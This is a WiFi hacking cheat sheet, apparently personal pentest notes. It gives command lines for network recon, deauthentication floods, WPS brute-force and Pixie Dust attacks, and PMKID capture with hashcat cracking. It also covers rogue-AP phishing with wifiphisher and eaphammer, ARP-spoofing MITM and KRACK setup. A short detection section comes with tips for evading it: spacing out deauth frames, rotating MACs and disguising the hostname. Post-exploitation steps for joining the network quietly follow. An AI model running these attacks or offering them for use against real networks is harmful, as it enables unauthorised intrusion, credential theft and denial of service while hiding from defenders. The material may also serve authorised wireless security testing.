aex.red

WiFi Hacking

Setup & Troubleshooting

lsusb
dmseg

ip a

Recon

  • Sniff for network encryption types, get an understanding of the network.
# WireShark Filter
wlan.fc.type_subtype == 0x08  # Beacon
wlan.da && wlan.sa

tshark TODO
tcpdump -i wlan0mon -e -s 256 type mgt

aircrack-ng

# Kill interfering processes
airmon-ng check kill
 
# Re-enable
systemctl restart NetworkManager
 
# Enable/disable monitor mode
airmon-ng start wlan0mon
airmon-ng stop wlan0mon
 
# Scan for available networks
airodump-ng wlan0mon
 
# Save traffic captures and analyze in Wireshark
airodump-ng -w capture wlan0mon
 
# Scan more channels (5Ghz)
airodump-ng --band abg wlan0mon
airodump-ng --channel hopping wlan0mon
 
# Focus on a specific BSSID and capture handshakes
airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon

Warning

Airodump may show many “fake” clients that change MACs frequently. Look for persistent client MACs associated with an AP. Use -w to capture packets and analyse them in Wireshark.

kismet

# Passive network discovery
kismet -c wlan0mon

Hidden SSIDs

# Capture packets to reveal hidden SSID
airodump-ng --essid-hidden -c <channel> --bssid <BSSID> wlan0mon

MAC Address Spoofing & Bypass Filtering

# Scan for connected clients
airodump-ng -c <channel> --bssid <BSSID> wlan0mon
 
# Change MAC address
ifconfig wlan0mon down
macchanger -m <TARGET_MAC> wlan0mon
ifconfig wlan0mon up
  • Check the BSSID MAC to determine the device vendor.
macchanger -l | grep <MAC prefix>
oui-lookup <MAC>

Extract PKMIDs from clients

hcxdumptool -i wlan0mon --enable_status=1 -o capture.pcap

Automated Recon & Attack

wifite

# Automate WiFi attacks including WPS brute-force, WPA handshake capture, and deauth attacks
wifite -i wlan0mon --wps --pmkid --wep

airgeddon

# Interactive framework that automates multiple WiFi attack techniques
./airgeddon.sh

Deauthentication & Dissociation

  • Overview: These attacks exploit the lack of authentication in deauth and disassociation frames, forcing clients to disconnect. This can be used to capture handshakes for cracking or disrupt network access.
  • Force deauthentication of a client, then capture handshake request to reconnect, crack offline.
# Deauthenticate all clients on a network
aireplay-ng --deauth 0 -a <BSSID> wlan0mon
 
# Deauthenticate a specific client
aireplay-ng --deauth 0 -a <BSSID> -c <CLIENT_MAC> wlan0mon
  • mdk4 (Advanced Dissociation Attack)
# Flood AP with dissociation frames to disrupt network
mdk4 wlan0mon d -B <BSSID>

WPS (Brute Force & Pixie Dust)

  • Overview: Wi-Fi Protected Setup (WPS) is vulnerable due to weak PIN-based authentication, which can be exploited through brute-force attacks or logic flaws to reveal the WPA2 passphrase.
  • Pixie Dust Attack: Exploits weak WPS nonce generation, allowing instant key recovery.
  • Null PIN Attack: Some routers accept a 00000000 PIN, bypassing authentication.
# Brute-force the WPS PIN to retrieve WPA2 passphrase
reaver -i wlan0mon -b <BSSID> -vv
 
# Pixie Dust Attack
reaver -i wlan0mon -b <BSSID> -K 1 -vv
 
# Test for Null PIN
reaver -i wlan0mon -b <BSSID> -p '' -vv
# Offline WPS Attack using Bully
bully -b <BSSID> -c <channel> -i wlan0mon

PMKID Attack

Captures PMKID (Pairwise Master Key Identifier) from WPA2 networks without needing a handshake. It is useful against routers that support PMK caching.

# Capture PMKID from target AP
hcxdumptool -i wlan0mon --enable_status=1 -o capture.pcap
 
# Convert the PMKID capture to hashcat format
hcxpcapngtool -o hashcat_hash.16800 capture.pcap
 
# Crack using hashcat
hashcat -m 16800 hashcat_hash.16800 <wordlist>

Rogue AP & MITM Attack

  • Karma & MANA Attacks: Force clients to automatically connect to the rogue AP.
  • EAPHammer: Targets WPA2-Enterprise networks for credential harvesting.
  • wifiphisher: Creates a phishing portal to capture WPA credentials.
# Set up a rogue AP for credential phishing
wifiphisher -i wlan0mon --essid "Free WiFi" --phishing-mode firmware-upgrade
# Set up an Evil Twin attack on WPA2-Enterprise
eaphammer --interface wlan0mon --channel 6 --essid "CorpWiFi" --creds
# Karma attack to trick clients into connecting
mana-toolkit --mana-enable
# MITM Attack using ettercap
ettercap -T -q -i wlan0 -M arp:remote /<target>/ /<gateway>/

WPA2 Krack

  • Overview: The Key Reinstallation Attack (KRACK) exploits vulnerabilities in the WPA2 handshake process, allowing attackers to manipulate and replay encryption keys. This can lead to decryption of traffic, session hijacking, and even injection of malicious packets.
  • This attack targets WPA2’s four-way handshake, forcing the client to reinstall an already-used key, weakening encryption.
# Example of setting up a KRACK attack environment
wpa_supplicant -D nl80211 -i wlan0mon -c krack.conf
 
# Using modified hostapd to exploit KRACK
hostapd-wpe /path/to/hostapd.conf
  • Mitigation: KRACK is mitigated by implementing patches at the client level, updating firmware, and enforcing WPA3 where possible.

Detection & Response

  • Deauthentication/Dissociation Detection:

    • Enterprise WIDS/WIPS detects spikes in control frames.
    • Can alert or auto-mitigate based on threshold.
    • Consumer routers typically do not detect this.

  • Rogue AP / Evil Twin Detection:

    • Detected by WIDS through duplicate SSIDs, rogue BSSIDs, or client misassociation.
    • Some NAC/WIPS can triangulate rogue signal sources.

  • WPS Attacks:

    • Enterprise can detect brute-force WPS attempts.
    • Consumer routers may lock WPS after repeated failures but rarely alert.

  • PMKID / Handshake Capture:

    • Hard to detect since it’s a passive sniffing attack.
    • Enterprise solutions may flag anomalous client behaviors or EAPOL bursts.

  • Beacon/Probe Floods / SSID Spam:

    • Detected by WIDS as DoS conditions or malformed beacon anomalies.
    • Consumer gear typically drops performance without alerts.

  • Detection Tools in Enterprise:

    • Cisco WLC, Aruba ClearPass, Ekahau Analyzer, AirMagnet, Snort with 802.11 rules.
    • Open-source: Kismet, WIDS-mode hostapd.

  • Tips for Evading Detection:

    • Use passive methods like PMKID capture.
    • Space out deauth packets.
    • Avoid SSID spam unless testing WIDS response.
    • Rotate MACs and reduce transmit power.

Post-Exploitation

  • Passive Observation First:
    • Stay in monitor mode and continue using airodump-ng to identify active clients, IP schemes, and MAC patterns.
airodump-ng wlan0mon --bssid <target-bssid> -c <channel>

  • Look for typical client behaviour or MAC addresses you can spoof.

  • MAC Spoofing:

    • Clone a valid but inactive MAC to evade MAC filtering or blend into network traffic.
ifconfig wlan0 down
macchanger -r wlan0 # Random MAC
# Or
macchanger -m <valid_MAC> wlan0
ifconfig wlan0 up
 
# Consider changing your hostname to something innocuous! 
hostnamectl set-hostname printer-01

  • Avoid DHCP Where Possible:

  • Force Manual Association without DHCP

# Create a WPA2 config file
wpa_passphrase "<SSID>" "<password>" > wpa.conf
 
# Run association in the background
wpa_supplicant -i wlan0 -c wpa.conf -B
 
# Confirm link up
iw wlan0 link
 
# Set a manual IP if subnets known
ip addr add 192.168.1.150/24 dev wlan0
ip route add default via 192.168.1.1
 
# Or request DHCP lease in another terminal
dhclient wlan0
  • Otherwise request a DHCP lease while associating (noisy!)
# Associate and grab DHCP lease
nmcli dev wifi connect "<SSID>" password "<password>" ifname wlan0
 
# Associate to hidden SSID
nmcli dev wifi connect "HiddenSSID" password "<password>" bssid XX:XX:XX:XX:XX:XX ifname wlan0

Passive Sniffing

arp -a
tcpdump -i wlan0
netdiscover -i wlan0 -r 192.168.0.1/24
  • Only Scan When Ready:
    • Use limited ping sweeps or nmap -sn initially.
    • If noise is acceptable, escalate to targeted port scans and responder-type activity.
nmap -sn 192.168.1.0/24
responder -I wlan0
  • Watch for Countermeasures:
    • Monitor for client isolation, 802.1X reauths, NAC quarantine VLANs.
    • Be prepared to rotate MAC/IP or retreat to passive mode.

Graph View